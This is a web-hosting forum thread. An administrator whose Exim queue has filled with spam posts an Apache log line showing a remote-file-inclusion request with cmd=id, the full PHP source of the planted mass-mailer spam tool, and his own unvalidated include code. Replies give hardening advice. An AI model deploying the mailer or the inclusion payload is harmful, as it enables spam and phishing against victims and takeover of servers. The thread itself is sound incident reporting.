Results 1 to 3 of 3

Thread: Spam thru PHP

  1. #1
    Join Date
    Sep 2006

    Spam thru PHP

    Hell everybody,

    Since a few weeks I have a lot of issues with Exim, Spam etc...

    I would like to ask you how to :
    • flush spam queue
    • prevent this in the future
    • some advices
    Details :

    It looks that I have a pretty huge mail queue :

    [[email protected] moskovoi]# exim -bpc

    well, I started to check a bit the logs, and I found the surprise in an apache log. My apache log looks like this :

    SOMEIP - - [03/Sep/2006:08:57:49 +0200] "GET /xxxx/index2.php?page=***********/paugrande/script.jpg?cmd=id HTTP/1.1" 200 4097 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv: Gecko/20060728 Firefox/"
    and the script.jpg looks like this :


    $testa = $_POST['veio'];

    if($testa != "") {

    $message = $_POST['html'];

    $subject = $_POST['assunto'];

    $de = $_POST['de'];

    $to = $_POST['emails'];

    // ler o conteúdo do arquivo para uma string

    //$handle = fopen ($emails, "r");

    //$to = fread ($handle, filesize ($emails));

    //fclose ($handle);

    //$handle2 = fopen ($html, "r");

    //$message = fread ($handle2, filesize ($html));

    //fclose ($handle2);

    $headers = "MIME-Version: 1.0\r\n";

    $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";

    $email = explode("\n", $to);

    $headers .= "From: ".$RealName." <".$de.">\r\n";

    $message = stripslashes($message);

    $i = 0;

    $count = 1;

    while($email[$i]) {

    $ok = "ok";

    if(mail($email[$i], $subject, $message, $headers))

    echo "* Número: $count <b>".$email[$i]."</b> <font color=green>OK</font><br><hr>";


    echo "* Número: $count <b>".$email[$i]."</b> <font color=red>ERRO AO ENVIAR</font><br><hr>";





    if($ok == "ok")

    echo "<script> alert('Terminou os emails. ".$count." e-mails enviados'); </script>";






    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">


    .normal {

    font-family: Arial, Helvetica, sans-serif;

    font-size: 12px;

    color: #000000;


    .form {

    font-family: Arial, Helvetica, sans-serif;

    font-size: 10px;

    color: #333333;

    background-color: #FFFFFF;

    border: 1px dashed #666666;


    .style1 {

    font-family: Verdana, Arial, Helvetica, sans-serif;

    font-weight: bold;




    <body leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">

    <form action="" method="post" enctype="multipart/form-data" name="form1">

    <input type="hidden" name="veio" value="sim">

    <table width="464" height="511" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" class="normal">


    <td width="462" height="25" align="center" bgcolor="#F4F4F4">
    <font face="Georgia" style="font-size: 70pt"><b>Trinoo</b></font></td>



    <td height="194" valign="top" bgcolor="#FFFFFF">
    <table width="89%" border="0" cellpadding="0" cellspacing="5" class="normal" height="444">


    <td align="right" height="17"><span class="style1">De:</span></td>

    <td width="88%" height="17">
    <input name="de" type="text" class="form" id="de" size="84" ></td>



    <td align="right" height="17"><span class="style1">Assunto:</span></td>

    <td height="17">
    <input name="assunto" type="text" class="form" id="assunto" size="84" ></td>


    <tr align="center" bgcolor="#F4F4F4">

    <td height="20" colspan="2"><span class="style1">C&oacute;digo HTML:</span></td>


    <tr align="right">

    <td height="146" colspan="2" valign="top"> <br> <font color="#990000" size="1">

    <textarea name="html" cols="105" rows="8" wrap="VIRTUAL" class="form" id="html"></textarea>

    <span class="style1">*Engenharia em HTML</span></font></td>


    <tr align="center" bgcolor="#F4F4F4">

    <td height="47" colspan="2"><span class="style1">Coloque o email de suas vitimas abaixo:
    <p><span class="style1">OBS: um e-mail em cima do outro


    <tr align="right">

    <td height="136" colspan="2" valign="top"><br>

    <textarea name="emails" cols="105" rows="8" wrap="VIRTUAL" class="form" id="emails"></textarea>

    <span class="style1"><font color="#990000" size="1">*Separado por quebra de linha</font></span> </td>



    <td height="26" align="right" valign="top"><input type="submit" name="Submit" value="Enviar"></td>

    <td align="center" valign="top" height="26">
    <p align="right">greetz: by mendes_rs</td>





    <td height="15" align="center" bgcolor="#F4F4F4">&nbsp;</td>




    Looks like a SPAM-TOOL
    . Well, I check the php page code hosted on my server and it looks like this :


    $page = $_GET['page']; // ON CREE LA VARIABLE PAGE

    echo"\n"; // POUR LA PROPRETE DU CODE


    echo"\n"; // POUR LA PROPRETE DU CODE


  2. #2
    Join Date
    Mar 2006
    First install Apache mod_security to prevent this. Then you can harden PHP. Consider compile Apache with phpsuexec will prevent user nobody from sending emails too.

    Thanks. - Web Hosting with DDoS Protection | Shared & Reseller in Europe/North America
    Linux/Windows RDP VPS 13 Locations : UK, US (5 states), Mexico, Canada, Bulgaria, Lithuania,
    Italy, France, Germany,Netherlands, Switzerland, Rissia, Singapore | OpenVPN/PPTP Enabled
    INSTANT | PayPal, Skrill, Payza, Bitcoin, WebMoney, Perfect Money, Ukash, CashU, paysafecard

  3. #3
    if you have #ProxyRequests is On then set it to Off and restart the apache. Do not allow proxy to be your server from other resources


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts